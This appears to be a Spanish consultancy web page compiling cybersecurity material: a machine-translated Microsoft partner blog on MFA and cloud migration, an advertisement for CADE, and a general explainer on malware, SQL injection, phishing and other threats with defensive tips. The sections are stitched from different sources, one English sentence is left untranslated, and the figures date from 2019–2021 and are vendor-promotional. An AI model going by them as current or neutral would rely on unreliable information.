«La implementación de soluciones preventivas como la segmentación de la red maximizan la seguridad de las organizaciones ante la posibilidad de sufrir un ciber ataque, ya sea de ransomware o de cualquier otra índole, que causaría además del gran costo económico un enorme daño a su marca y a su reputación», finalizó Oswaldo Palacios. 

‎El cambio generalizado al trabajo remoto a principios del año pasado catalizó lo que nuestro CEO Satya Nadella ‎‎describió‎‎ como «dos años de transformación digital en dos meses». ‎

‎Ahora, se espera una nueva ola de cambio a medida que las organizaciones a nivel mundial cambian a un lugar de trabajo híbrido. ‎

‎Si bien este ritmo vertiginoso de evolución impulsada por la tecnología genera nuevas y emocionantes oportunidades para todo el ecosistema de socios de Microsoft, también descubre nuevos desafíos para que nuestros clientes naveguen, y una de las principales preocupaciones para cualquier organización es la ciberseguridad. Los cambios masivos en cómo y dónde trabajamos han generado nuevos tipos de amenazas de los malos actores cibernéticos, y se espera que la adopción más amplia del lugar de trabajo híbrido resulte en vulnerabilidades adicionales. ‎

‎Microsoft ‎‎procesa‎‎ más de 8 billones de señales cada 24 horas y repelió un récord de 30 mil millones de amenazas de correo electrónico el año pasado. A pesar de estos esfuerzos, el mundo ha entrado en lo que ‎‎el CVP de Microsoft, Vasu Jakkal,‎‎ se refirió como «un reino de ataques de siguiente nivel». Todos nosotros debemos evolucionar perpetuamente nuestros procesos de seguridad para mantenernos al día con los sofisticados ataques de los ciberdelincuentes y ‎‎los hackers de los estados nacionales,‎‎y nuestros clientes confían en los socios más que nunca para ayudarlos a tomar las medidas correctas para mantener seguros los datos de sus organizaciones. ‎

‎Estamos comprometidos a garantizar que los socios tengan los recursos, las herramientas y la orientación necesarios para ayudar a los clientes a evolucionar sus prácticas de seguridad. Estas son áreas específicas de enfoque que ayudan a los socios a abordar los problemas de seguridad, cumplimiento e identidad para los clientes. ‎

‎Adopción de la autenticación multifactor‎ 

‎Las contraseñas son ineficaces y costosas de administrar, mientras que otras formas de autenticación ofrecen una experiencia más segura y fácil de usar. Requerir más de una forma de autenticación, o autenticación multifactor (MFA), también es más eficaz para comprobar la identidad y, como resultado, aumentar la seguridad. ‎‎Según Microsoft CISO Bret Arsenault,‎‎»El uso de MFA es la práctica de seguridad más efectiva que las empresas no están empleando». Ha encabezado una campaña para eliminar las contraseñas por completo en Microsoft, y más del 90 por ciento de nuestra fuerza laboral actualmente utiliza métodos de autenticación alternativos. ‎

‎Al ayudar a los clientes a adoptar la autenticación multifactorial, los socios pueden ayudarlos a reducir drásticamente el riesgo de sus organizaciones. Sorprendentemente, solo el 18% de nuestros clientes tienen MFA activado. Teniendo en cuenta que cualquier cliente con una suscripción de servicio comercial (como Azure o Microsoft 365) puede activar MFA sin costo adicional, es una obviedad utilizar esta poderosa herramienta de defensa. Como la vicepresidenta sénior de Microsoft, Ann ‎‎Johnson, compartió‎‎recientemente: «El uso de bloques de MFA bloquea el 99,9 por ciento de los hackeos de cuentas a los que se enfrentan su organización y sus clientes, en promedio». Y en un mundo donde redes enteras de proveedores y otras empresas de terceros comparten información, cerrar las vulnerabilidades de una organización puede ayudar a aumentar la seguridad. ‎

‎Migración a la nube‎ 

‎Las organizaciones deben seguir evaluando la migración a la nube para aumentar la seguridad. Mantener y defender los centros de datos locales puede ser costoso y llevar mucho tiempo. Recurrir a la nube externaliza gran parte de ese trabajo, lo que permite a su personal de TI priorizar su tiempo para centrarse en problemas de alto valor. ‎‎Según‎‎ Ann Johnson, «Con más empresas que confían en la tecnología de la nube, el desarrollo de una estrategia integral de ciberresiliencia como parte de un enfoque holístico de la resiliencia operativa hace que la preparación para una amplia gama de contingencias sea menos complicada». ‎

‎Incorporamos la seguridad en todos nuestros productos y soluciones. La migración a Microsoft Azure permite a las empresas beneficiarse de las protecciones que ofrecen Microsoft Azure Sentinel, Microsoft Azure Active Directory, Microsoft Azure Purview y mucho más. Para revisar las últimas actualizaciones de seguridad relacionadas con Azure, puede leer mi blog sobre los‎‎ anuncios de seguridad‎‎ que hicimos durante Microsoft Ignite 2021 en marzo. ‎

‎Mejorar la capacitación de su fuerza de trabajo‎ 

‎La industria de la ciberseguridad se enfrenta a una escasez de trabajadores, lo que complica aún más mantenerse al día con la constante avalancha de ciberataques. Al crear los conjuntos de habilidades de seguridad dentro de su organización, puede posicionar mejor a su empresa para protegerse y ofrecer servicios valiosos y orientación a los clientes.‎

‎Nos esforzamos por garantizar que los socios tengan los recursos de capacitación y capacitación necesarios para mantener a su equipo preparado para manejar amenazas cibernéticas cada vez más complejas. Utilice nuestra ‎‎guía de habilitación‎‎ para encontrar cursos y recursos en línea. Nos complace anunciar que hemos lanzado cuatro nuevas certificaciones de seguridad, cumplimiento e identidad, que incluyen: ‎

• ‎La ‎‎certificación de fundamentos de seguridad, cumplimiento e identidad de Microsoft‎‎ puede ayudar a las personas a mostrar conocimientos fundamentales de seguridad, cumplimiento e identidad en los servicios de Microsoft relacionados y basados en la nube. Puede ‎‎prepararse‎‎ para esta nueva certificación aprendiendo los conceptos y capacidades de las soluciones de seguridad, cumplimiento y administración de identidades y acceso de Microsoft. ‎
• ‎La ‎‎certificación de administrador de Information Protection‎‎ puede ayudar a las personas a mostrar el conocimiento de los conceptos de datos principales y cómo se implementan mediante los servicios de datos de Azure.The Information Protection Administrator Certification can help individuals showcase knowledge of core data concepts and how they’re implemented using Azure data services. ‎
• ‎La ‎‎Certificación de Administrador de Identidad y Acceso‎‎ puede ayudar a las personas a mostrar el conocimiento de los principios básicos de gobierno de identidad, así como garantizar un ciclo de vida de identidad adecuado. ‎
• ‎La ‎‎certificación security operations analyst‎‎ puede ayudar a las personas a mostrar conocimientos sobre la mitigación de amenazas mediante soluciones de seguridad, cumplimiento e identidad de Microsoft, así como la realización de actividades proactivas de búsqueda de amenazas. ‎

‎En las próximas semanas, lanzaremos una nueva especialización avanzada de Hybrid Cloud Security. Esto ayudará a lograr un nivel único de diferenciación para las organizaciones ‎‎asociadas,‎‎ además de las actuales especializaciones avanzadas relacionadas con la seguridad para administración de identidad y acceso, protección y gobierno de la información y protección contra amenazas. ‎

‎La transformación digital continuará remodelando industrias enteras, y como lo hace, nuevas vulnerabilidades estarán expuestas. Si bien ninguna organización está exenta del riesgo cibernético, al usar la combinación correcta de recursos, conocimientos y herramientas, los socios pueden ayudar a nuestros clientes a forjar defensas que puedan reducir la probabilidad y el impacto de una violación. A medida que continuamos trabajando juntos, confío en que podamos estar a la altura del desafío de proteger nuestros datos colectivos, tanto ahora como en el futuro. ‎

Gracias a la consultoria de CADE podemos ayudarte asegurar que estas SEGURO!

visítanos cade.com.mx/diagnostico

La ciberseguridad es la práctica de defender las computadoras, los servidores, los dispositivos móviles, los sistemas electrónicos, las redes y los datos de ataques maliciosos. También se conoce como seguridad de tecnología de la información o seguridad de la información electrónica. El término se aplica en diferentes contextos, desde los negocios hasta la informática móvil, y puede dividirse en algunas categorías comunes.

• La seguridad de red es la práctica de proteger una red informática de los intrusos, ya sean atacantes dirigidos o malware oportunista.
• La seguridad de las aplicaciones se enfoca en mantener el software y los dispositivos libres de amenazas. Una aplicación afectada podría brindar acceso a los datos que está destinada a proteger. La seguridad eficaz comienza en la etapa de diseño, mucho antes de la implementación de un programa o dispositivo.
• La seguridad de la información protege la integridad y la privacidad de los datos, tanto en el almacenamiento como en el tránsito.
• La seguridad operativa incluye los procesos y decisiones para manejar y proteger los recursos de datos. Los permisos que tienen los usuarios para acceder a una red y los procedimientos que determinan cómo y dónde pueden almacenarse o compartirse los datos se incluyen en esta categoría.
• La recuperación ante desastres y la continuidad del negocio definen la forma en que una organización responde a un incidente de ciberseguridad o a cualquier otro evento que cause que se detengan sus operaciones o se pierdan datos. Las políticas de recuperación ante desastres dictan la forma en que la organización restaura sus operaciones e información para volver a la misma capacidad operativa que antes del evento. La continuidad del negocio es el plan al que recurre la organización cuando intenta operar sin determinados recursos.
• La capacitación del usuario final aborda el factor de ciberseguridad más impredecible: las personas. Si se incumplen las buenas prácticas de seguridad, cualquier persona puede introducir accidentalmente un virus en un sistema que de otro modo sería seguro. Enseñarles a los usuarios a eliminar los archivos adjuntos de correos electrónicos sospechosos, a no conectar unidades USB no identificadas y otras lecciones importantes es fundamental para la seguridad de cualquier organización.

La extensión de las ciberamenazas

Las ciberamenazas mundiales siguen desarrollándose a un ritmo rápido, con una cantidad cada vez mayor de filtraciones de datos cada año. En un informe de RiskBased Security, se reveló que unos alarmantes 7900 millones de registros han sido expuestos por filtraciones de datos solo en los primeros nueve meses del 2019. Esta cifra es más del doble (112 %) de la cantidad de registros expuestos en el mismo período durante el 2018.

Los servicios médicos, los minoristas y las entidades públicas fueron los que sufrieron más filtraciones, y los delincuentes maliciosos fueron los responsables de la mayoría de los incidentes. Algunos de estos sectores son más atractivos para los cibercriminales, ya que recopilan datos financieros y médicos, aunque todas las empresas que utilizan las redes pueden ser atacadas para robarles datos de clientes, hacer espionaje corporativo o lanzar ataques a sus clientes.

Con la extensión de las ciberamenazas en constante aumento, la Corporación Internacional de Datos predice que el gasto mundial en soluciones de ciberseguridad alcanzará la impresionante cifra de 133 700 millones de dólares para el año 2022. Los gobiernos de todo el mundo han respondido a las crecientes ciberamenazas con orientaciones para ayudar a las organizaciones a aplicar prácticas eficaces de ciberseguridad.

En Estados Unidos, el Instituto Nacional de Estándares y Tecnología (NIST) ha creado un marco de ciberseguridad. Para contrarrestar la proliferación de código malicioso y ayudar en la detección temprana, en el marco se recomienda el monitoreo continuo y en tiempo real de todos los recursos electrónicos.

La importancia de la vigilancia de los sistemas se refleja en los “10 pasos para la ciberseguridad”, orientación proporcionada por el Centro Nacional de Seguridad Cibernética del Gobierno del Reino Unido. En Australia, el Centro Australiano de Seguridad Cibernética (ACSC) publica periódicamente orientaciones sobre la forma en que las organizaciones pueden contrarrestar las últimas amenazas a la ciberseguridad.

Tipos de ciberamenazas

Las amenazas a las que se enfrenta la ciberseguridad son tres:

1. El delito cibernético incluye agentes individuales o grupos que atacan a los sistemas para obtener beneficios financieros o causar interrupciones.
2. Los ciberataques a menudo involucran la recopilación de información con fines políticos.
3. El ciberterrorismo tiene como objetivo debilitar los sistemas electrónicos para causar pánico o temor.

Pero ¿cómo consiguen los agentes malintencionados el control de los sistemas informáticos? Estos son algunos de los métodos comunes utilizados para amenazar la ciberseguridad:

Malware

“Malware” se refiere al software malicioso. Ya que es una de las ciberamenazas más comunes, el malware es software que un cibercriminal o un hacker ha creado para interrumpir o dañar el equipo de un usuario legítimo. Con frecuencia propagado a través de un archivo adjunto de correo electrónico no solicitado o de una descarga de apariencia legítima, el malware puede ser utilizado por los ciberdelincuentes para ganar dinero o para realizar ciberataques con fines políticos.

Hay diferentes tipos de malware, entre los que se incluyen los siguientes:

• Virus: un programa capaz de reproducirse, que se incrusta un archivo limpio y se extiende por todo el sistema informático e infecta a los archivos con código malicioso.
• Troyanos: un tipo de malware que se disfraza como software legítimo. Los cibercriminales engañan a los usuarios para que carguen troyanos a sus computadoras, donde causan daños o recopilan datos.
• Spyware: un programa que registra en secreto lo que hace un usuario para que los cibercriminales puedan hacer uso de esta información. Por ejemplo, el spyware podría capturar los detalles de las tarjetas de crédito.
• Ransomware: malware que bloquea los archivos y datos de un usuario, con la amenaza de borrarlos, a menos que se pague un rescate.
• Adware: software de publicidad que puede utilizarse para difundir malware.
• Botnets: redes de computadoras con infección de malware que los cibercriminales utilizan para realizar tareas en línea sin el permiso del usuario.

Inyección de código SQL

Una inyección de código SQL (por sus siglas en inglés Structured Query Language) es un tipo de ciberataque utilizado para tomar el control y robar datos de una base de datos. Los cibercriminales aprovechan las vulnerabilidades de las aplicaciones basadas en datos para insertar código malicioso en una base de datos mediante una instrucción SQL maliciosa. Esto les brinda acceso a la información confidencial contenida en la base de datos.

Phishing

El phishing es cuando los cibercriminales atacan a sus víctimas con correos electrónicos que parecen ser de una empresa legítima que solicita información confidencial. Los ataques de phishing se utilizan a menudo para inducir a que las personas entreguen sus datos de tarjetas de crédito y otra información personal.

Ataque de tipo “Man-in-the-middle”

Un ataque de tipo “Man-in-the-middle” es un tipo de ciberamenaza en la que un cibercriminal intercepta la comunicación entre dos individuos para robar datos. Por ejemplo, en una red Wi-Fi no segura, un atacante podría interceptar los datos que se transmiten desde el dispositivo de la víctima y la red.

Ataque de denegación de servicio

Un ataque de denegación de servicio es cuando los cibercriminales impiden que un sistema informático satisfaga solicitudes legítimas sobrecargando las redes y los servidores con tráfico. Esto hace que el sistema sea inutilizable e impide que una organización realice funciones vitales.

Ciberamenazas más recientes

¿Cuáles son las ciberamenazas más recientes contra las que deben protegerse las personas y las organizaciones? A continuación, se presentan algunas de las ciberamenazas más recientes comunicadas por los gobiernos de Estados Unidos, Australia y el Reino Unido.

Malware Dridex

En diciembre del 2019, el Departamento de Justicia de los Estados Unidos (DoJ) imputó al líder de un grupo de cibercriminales organizados por su participación en un ataque global del malware Dridex. Esta campaña malintencionada afectó al público, al gobierno, a la infraestructura y a las empresas de todo el mundo.

Dridex es un troyano financiero que posee diferentes funcionalidades. Desde el 2014, afecta a las víctimas e infecta a las computadoras a través de correos electrónicos de phishing o malware existente. Es capaz de robar contraseñas, datos bancarios y datos personales que pueden utilizarse en transacciones fraudulentas, y ha causado pérdidas financieras masivas que suman cientos de millones de dólares.

En respuesta a los ataques de Dridex, el Centro Nacional de Seguridad Cibernética del Reino Unido aconseja a las personas que “se aseguren de que los dispositivos estén actualizados y los antivirus estén activados y actualizados, y de que se realicen copias de seguridad de los archivos”.

Estafas románticas

En febrero del 2020, el FBI advirtió a los ciudadanos de EE. UU. que tuvieran cuidado con el fraude a la confianza que los cibercriminales cometen a través de sitios de citas, salas de chat y aplicaciones. Los perpetradores se aprovechan de las personas que buscan nuevas parejas y engañan a las víctimas para que proporcionen sus datos personales.

El FBI informa que las ciberamenazas románticas afectaron a 114 víctimas de Nuevo México durante 2019, cuyas pérdidas financieras sumaron 1 600 000 dólares.

Malware Emotet

A finales del 2019, el Centro Australiano de Seguridad Cibernética advirtió a las organizaciones nacionales sobre la ciberamenaza mundial generalizada del malware Emotet.

Emotet es un sofisticado troyano que puede robar datos y también cargar otros malware. Emotet se aprovecha de las contraseñas poco sofisticadas y es un recordatorio de la importancia de crear una contraseña segura para protegerse de las ciberamenazas.

Protección del usuario final

La protección del usuario final o la seguridad de endpoints es un aspecto fundamental de la ciberseguridad. Después de todo, a menudo es un individuo (el usuario final) el que accidentalmente carga malware u otra forma de ciberamenaza en su equipo de escritorio, laptop o dispositivo móvil.

Por tanto, ¿de qué manera protegen las medidas de ciberseguridad a los usuarios finales y los sistemas? En primer lugar, la ciberseguridad depende de los protocolos criptográficos para cifrar los correos electrónicos, archivos y otros datos críticos. La ciberseguridad no solo protege la información en tránsito, también ofrece protección contra las pérdidas o el robo.

Además, el software de seguridad del usuario final analiza las computadoras para detectar código malicioso, pone en cuarentena este código y lo elimina del equipo. Los programas de seguridad pueden incluso detectar y eliminar el código malicioso oculto en el registro de arranque maestro (MBR) y están diseñados para cifrar o borrar datos del disco duro de la computadora.

Los protocolos de seguridad electrónica también se enfocan en la detección de malware en tiempo real. Muchos utilizan el análisis heurístico y de comportamiento para monitorear el comportamiento de un programa y su código para defenderse de virus o troyanos que pueden cambiar de forma con cada ejecución (malware polimórfico y metamórfico). Los programas de seguridad pueden restringir los programas que puedan ser maliciosos en una burbuja virtual separada de la red del usuario para analizar su comportamiento y aprender a detectar mejor las nuevas infecciones.

Los programas de seguridad continúan desarrollando nuevas defensas mientras los profesionales de la ciberseguridad identifican nuevas amenazas y formas de combatirlas. Para aprovechar al máximo el software de seguridad del usuario final, los empleados deben aprender a utilizarlo. Lo fundamental es mantenerlo en funcionamiento y actualizarlo con frecuencia para que pueda proteger a los usuarios de las ciberamenazas más recientes.

Consejos de ciberseguridad: protéjase de los ciberataques

¿Cómo pueden las empresas y las personas protegerse contra las ciberamenazas? A continuación, presentamos nuestros mejores consejos de ciberseguridad:

1. Actualizar el software y el sistema operativo: esto significa que aprovechará las últimas revisiones de seguridad.
2. Utilizar software antivirus: las soluciones de seguridad, como Kaspersky Total Security, detectarán y eliminarán las amenazas. Mantenga su software actualizado para obtener el mejor nivel de protección.
3. Utilizar contraseñas seguras: asegúrese de que sus contraseñas no sean fáciles de adivinar.
4. No abrir archivos adjuntos de correos electrónicos de remitentes desconocidos: podrían estar infectados con malware.
5. No hacer clic en los vínculos de los correos electrónicos de remitentes o sitios web desconocidos: es una forma común de propagación de malware.
6. Evitar el uso de redes Wi-Fi no seguras en lugares públicos: las redes no seguras lo dejan vulnerable a ataques del tipo “Man-in-the-middle”.